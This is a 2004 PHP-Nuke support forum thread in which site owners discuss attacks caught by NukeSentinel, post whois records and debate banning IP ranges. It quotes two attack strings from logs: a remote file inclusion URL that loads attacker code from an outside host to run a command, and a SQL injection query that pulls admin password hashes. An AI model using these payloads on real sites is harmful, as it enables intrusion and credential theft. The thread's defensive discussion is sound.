Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
stephen2417
Worker
Worker



Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Wed Jun 02, 2004 12:05 am Reply with quote

Wow im supprised now.. I do beleive this is a fake thing to, thats what my friend told me.

Heres what they did..
/index.php?file=http://www.angelfire.com/linux/arplhmd/exec.php&cmd=id

Is that a valid hack.. Ill post their ip if you want too.
 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Wed Jun 02, 2004 12:30 am Reply with quote

May be an attempt to steal your cookie. This is a very old exploit. Go ahead and post the IP. The kids from Brazil were using this many months ago.
 
View user's profile Send private message
stephen2417







PostPosted: Wed Jun 02, 2004 9:59 am Reply with quote

Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: whois://whois.lacnic.net

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see http://www.lacnic.net/ for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail: abuse@lacnic.net

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: abuse@lacnic.net
 
stephen2417







PostPosted: Wed Jun 02, 2004 10:01 am Reply with quote

Oh and darn.. I frogot to turn the pc killer on...
 
stephen2417







PostPosted: Thu Jun 03, 2004 11:30 am Reply with quote

Raven I think that it would be a great idea for you to start a public shame list on your site. Mabye a module that everyone could add ip's to and get an sql dump to add right into sentinel.

Could that work?
 
Raven







PostPosted: Thu Jun 03, 2004 11:38 am Reply with quote

If the majority of IP's were static then maybe. The thing is, most IP's, especially those being used by crackers, are either dhcp, forged, or proxied, and aren't worth much other than to report to the abuse links of the ISP that was used. In theory it sounds good but in practice I'm not sure it ultimately achieves the intended goal. But, never one to stifle creativity Smile Let's see what others have to say!
 
squiresmk
Regular
Regular



Joined: May 31, 2004
Posts: 95
Location: NY

PostPosted: Thu Jun 03, 2004 12:16 pm Reply with quote

Might be useful in the wrong run. If duplicate IPs surfice in the list... have a running tally on the common ones then.
 
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
xfsunolesphp
Regular
Regular



Joined: Aug 23, 2003
Posts: 77

PostPosted: Thu Jun 03, 2004 12:34 pm Reply with quote

200.0.0 to 200.255.255 is leading Hacker IP. what these people teach to do? hacking?
 
View user's profile Send private message
stephen2417







PostPosted: Thu Jun 03, 2004 12:50 pm Reply with quote

And 210.0.0 to 210.255.255 (thanks to bob for telling me that)
 
GanjaUK
Life Cycles Becoming CPU Cycles



Joined: Feb 14, 2004
Posts: 633
Location: England

PostPosted: Thu Jun 03, 2004 1:09 pm Reply with quote

1 persons enemy might not be another's. Don't want those htaccess files getting over bulky. Smile
Mine is already huge... my htaccess is pretty big too. Laughing

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
stephen2417







PostPosted: Thu Jun 03, 2004 1:10 pm Reply with quote

Oh i dont even use the htaccess file bc my host dosent support it.. but im sure when i move to raven's hosting in october ill use it Wink
 
SmackDaddy
Involved
Involved



Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH

PostPosted: Fri Jun 04, 2004 6:30 am Reply with quote

stephen2417 wrote:
Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48



I think they said you could put in 200.0.0.0 and that would block the entire IP range.....with 1.2.0, I think it might even accept 200.*.*.* .... someone correct me if I am wrong tho.....
 
View user's profile Send private message Send e-mail Visit poster's website
Raven







PostPosted: Fri Jun 04, 2004 6:43 am Reply with quote

It has always had the ability to ban at any level of octet. And with v1.2 either 200.*.*.* or 200.0.0.0 will work.
 
stephen2417







PostPosted: Fri Jun 04, 2004 1:32 pm Reply with quote

Why must hackers be so dumb.. Yet another silly silly mistake. They did a union on my downloads and i dont even have them active.. I mean HELLO...
Query String: /modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Who-Is for IP
202.156.229.91




OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
NetName: APNIC-CIDR-BLK
NetHandle: NET-202-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate: 1994-04-05
Updated: 2004-03-30

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3100
OrgTechEmail: search-apnic-not-arin@apnic.net


Dont worry they missed the banner on my home page im sure they understand what Sentinelâ„¢ Protected means now. They are burning in hell along with popups of death Twisted Evil Twisted Evil Twisted Evil (Sorry am i evil?)
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©